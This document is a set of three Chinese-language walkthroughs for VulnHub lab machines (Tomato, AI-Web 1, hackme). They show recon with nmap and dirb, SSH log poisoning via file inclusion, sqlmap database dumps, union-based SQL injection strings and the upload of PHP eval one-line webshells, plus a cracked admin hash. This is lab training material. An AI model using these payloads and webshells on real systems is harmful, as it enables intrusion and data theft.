[tomato]靶机复现漏洞详解!
靶机地址:
https://download.vulnhub.com/tomato/Tomato.ova
靶机环境:Vmware
网络:NAT模式
信息收集:
arp-scan -l 扫描靶机ip地址
扫描开放的端口信息 nmap -sS -sV -p- 192.168.77.135
发现开放端口21,80,2211,8888.
既然开放了web端口,那看看它有什么
dirb http://192.168.77.135 扫描目录
访问发现存在目录遍历。
查看infoPHP文件的源码,文件包含的代码“include”
漏洞利用:
读取一下etc/password,读取成功,存在文件包含漏洞。
之前扫描出来 2211 远程连接端口,尝试连接,然后访问日志/var/log/auth.log,发现无论是否连接成功,日志中都会出现用户名及其操作
将一句话木马作为用户名使用 ssh 连接靶机 ip
注:这里 kali 出问题,用户名内不能有特殊字符,随便切换一个 linux 主机连接即可
ssh '<?php eval($_POST[cmd]); ?>'@192.168.77.135 -p 2211
写入成功.
使用蚁剑连接日志地址试试
连接成功 得到信息
------------------
【A1web 1.0】靶机复现详解!
靶机地址:
https://www.vulnhub.com/entry/ai-web-1,353/
攻击机:kali
首先虚拟机建一个A1web 1.0靶机 切换nat模式 然后kali扫描
nmap -sV ip段 0/24 扫描出ip进行访问
访问没有什么信息
使用dirb 对网页进一步扫描
扫描出来地址进行访问
尝试发现robots.txt中有内容
访问发现/m3diNf0/不能正常访问
发现/se3reTdir777/uploads/也不能访问页面
使用dirb 对/m3diNf0和/se3reTdir777扫描
发现一个网址访问发现是phpinfo页面
继续扫/se3reTdir777
发现是查询页面 考虑sql注入 输入’报错发现sql注入漏洞
通过抓包得到注入点uid=1&Operation=Submit
使用sqlmap注入页面为http://192.168.77.134/se3reTdir777/index.php
注入点为uid=1&Operation=Submit--dbs 列出数据库
sqlmap -u "http://192.168.77.134/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -dbs
得到了aiweb1 information_schema 两个数据库 -D 指定数据库 aiweb1 --tables 列出表名
sqlmap -u "http://192.168.77.134/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 --tables
得到 user systemUser 两个表名 再通过-T 指定表名user --columns 列出字段
sqlmap -u "http://192.168.77.134/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 -T user --columns
it" -D aiweb1 -T user --columns
得到 firstName id lastName 3个字段 再-C 指定字段 id --dump 获取字段中的数据
sqlmap -u "http://192.168.77.134/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 -T user -C id --dump
获取shell:
sqlmap -u "http://192.168.77.134/se3reTdir777/" --data "uid=1&Operation=Submit" --
选2自定义路径 连接成功
上传一句话木马
<?php @eval($_POST['cmd'])?>
上传成功
访问使用蚁剑连接
连接成功并添加得到信息
------------------------------
[hackme]靶机复现漏洞详解!!
靶场介绍:
靶机下载地址:
hackme: 1 ~ VulnHubhttps://www.vulnhub.com/entry/hackme-1,330/
首先虚拟机建一个hackme靶机 切换nat模式 然后kali扫描自己全端口
nmap -sV ip段 0/24 扫描出ip进行访问
发现是个登录页面可以注册先注册然后登录
发现是搜索框,我们直接用搜索型的sql注入
判断用什么注入
经过实验 得出 我们可以使用 booktitle下的名字加’ and 1=1#
也就是说 使用 CISSP Guide' and 1=1#
CISSP Guide' and 1=2#
使用union联合注入 查看数据库名字
CISSP Guide' union select 1,2,database() #
得出数据库名,查看数据库下的表名,可以通过group_concat()函数拼接显示所有表名:
CISSP Guide' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='webapphacking' #
查看users表下的字段
CISSP Guide' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' #
获取字段下的数据
CISSP Guide' union select user,name,pasword from users #
经过尝试为 superadmin 2386acb2cf356944177746fc92523983 SGD
确定为这个账号 将密码md5解密
解密出密码为 Uncrackable 然后去登录
解密出密码为 Uncrackable 然后去登录
发现可以上传图片 我们就可以尝试一下上传木马
已上传至uploads文件夹里 访问一下
访问成功,使用蚁剑连接一下
添加获得查看信息